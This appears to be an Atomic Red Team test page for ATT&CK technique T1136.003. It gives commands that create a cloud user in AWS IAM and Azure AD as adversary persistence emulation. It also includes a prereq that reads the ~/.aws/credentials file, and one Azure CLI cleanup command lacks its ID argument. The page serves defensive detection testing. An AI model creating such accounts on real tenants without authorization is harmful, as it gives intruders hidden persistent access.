T1136.003
Create Account: Cloud Account
Description from ATT&CK
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.
Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding Additional Cloud Credentials or assigning Additional Cloud Roles.
Atomic Tests
Atomic Test #1 - AWS - Create a new IAM user
Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time
Supported Platforms: iaas:aws
auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the IAM user to create in AWS | string | atomicredteam |
Attack Commands: Run with sh!
1
2
aws iam create-user --user-name #{username}
Cleanup Commands:
1
2
aws iam delete-user --user-name #{username}
Dependencies: Run with sh!
Description: Check if ~/.aws/credentials file has a default stanza is configured
Check Prereq Commands:
1
2
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
1
2
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
Atomic Test #2 - Azure AD - Create a new user
Creates a new user in Azure AD. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
Supported Platforms: azure-ad
auto_generated_guid: e62d23ef-3153-4837-8625-fa4a3829134d
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Display name of the new user to be created in Azure AD | string | atomicredteam |
| userprincipalname | User principal name (UPN) for the new Azure user being created format email address | string | atomicredteam@yourdomain.com |
| password | Password for the new Azure AD user being created | string | reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg |
Attack Commands: Run with powershell!
1
2
3
4
5
6
7
Connect-AzureAD
$userprincipalname = "#{userprincipalname}"
$username = "#{username}"
$password = "#{password}"
$PasswordProfile = New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile
$PasswordProfile.Password = $password
New-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName $username
Cleanup Commands:
1
Remove-AzureADUser -ObjectId "#{userprincipalname}"
Dependencies: Run with powershell!
Description: Check if AzureAD PowerShell module is installed Check Prereq Commands:
1
Get-InstalledModule -Name AzureAD
Get Prereq Commands:
1
echo "use the following to install AzureAD PowerShell module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery -Force"
Description: Check if AzureAD PowerShell module is installed Check Prereq Commands:
1
Update the input arguments so the userprincipalname value is accurate for your environment
Get Prereq Commands:
1
echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
Atomic Test #3 - Azure AD - Create a new user via Azure CLI
Creates a new user in Azure AD via the Azure CLI. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
Supported Platforms: azure-ad
auto_generated_guid: 228c7498-be31-48e9-83b7-9cb906504ec8
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Display name of the new user to be created in Azure AD | string | atomicredteam |
| userprincipalname | User principal name (UPN) for the new Azure user being created format email address | string | atomicredteam@yourdomain.com |
| password | Password for the new Azure AD user being created | string | reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg |
Attack Commands: Run with powershell!
1
2
3
4
5
6
az login
$userprincipalname = "#{userprincipalname}"
$username = "#{username}"
$password = "#{password}"
az ad user create --display-name $username --password $password --user-principal-name $userprincipalname
az ad user list --filter "displayname eq 'atomicredteam'"
Cleanup Commands:
1
az ad user delete --id
Dependencies: Run with powershell!
Description: Check if Azure CLI is installed and install manually Check Prereq Commands:
1
az account list
Get Prereq Commands:
1
echo "use the following to install the Azure CLI manually https://aka.ms/installazurecliwindows"
Description: Check if Azure CLI is installed and install via PowerShell Check Prereq Commands:
1
az account list
Get Prereq Commands:
1
echo "use the following to install the Azure CLI $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
Description: Update the userprincipalname to meet your requirements Check Prereq Commands:
1
Update the input arguments so the userprincipalname value is accurate for your environment
Get Prereq Commands:
1
echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"